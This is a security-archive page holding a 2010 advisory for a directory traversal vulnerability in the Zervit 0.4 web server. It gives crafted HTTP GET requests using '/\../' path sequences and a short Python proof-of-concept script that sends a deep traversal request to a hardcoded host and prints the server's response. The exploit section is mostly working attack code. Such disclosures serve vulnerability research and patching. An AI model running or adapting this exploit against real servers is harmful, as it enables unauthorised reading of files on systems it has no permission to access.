Zervit 0.4 Directory Traversal

Zervit 0.4 Directory Traversal: Posted May 12, 2010; Authored by AutoSec Tools; Zervit version 0.4 suffers from a directory traversal vulnerability.; tags | exploit, file inclusion; SHA-256 | 7c1ca6fe84c4de2aa716b107c41d848c7e69aa998fa8938b2484e801aeeb0a1c; Download | Favorite | View

Zervit 0.4 Directory Traversal

#============================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Directory Traversal                                                               #
# Software.................Zervit 0.4                                                                        #
# Download.................http://sourceforge.net/projects/zervit/                                           #
# Date.....................5/11/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# It's possible to navigate the local file system of a server running Zervit 0.4 by using a specially        #
# crafted HTTP request. The resource path must be relative and the slashes unencoded.                        #
#                                                                                                            #
#                                                                                                            #
# ##Exploit##                                                                                                #
#                                                                                                            #
# GET /\../ HTTP/1.1                                                                                         #
# Host: localhost                                                                                            #
#                                                                                                            #
# or                                                                                                         #
#                                                                                                            #
# GET //../ HTTP/1.1                                                                                         #
# Host: localhost                                                                                            #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
import sys, struct, socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /' + '\..' * 32 + '/ HTTP/1.1\r\n'
       'Host: ' + host + '\r\n\r\n')

while 1:
    response = s.recv(8192)
    if not response: break
    print response

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 63 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
kai6u 3 files
gabe_k 3 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

Zervit 0.4 Directory Traversal

Zervit 0.4 Directory Traversal

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Zervit 0.4 Directory Traversal

Share This

Zervit 0.4 Directory Traversal

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems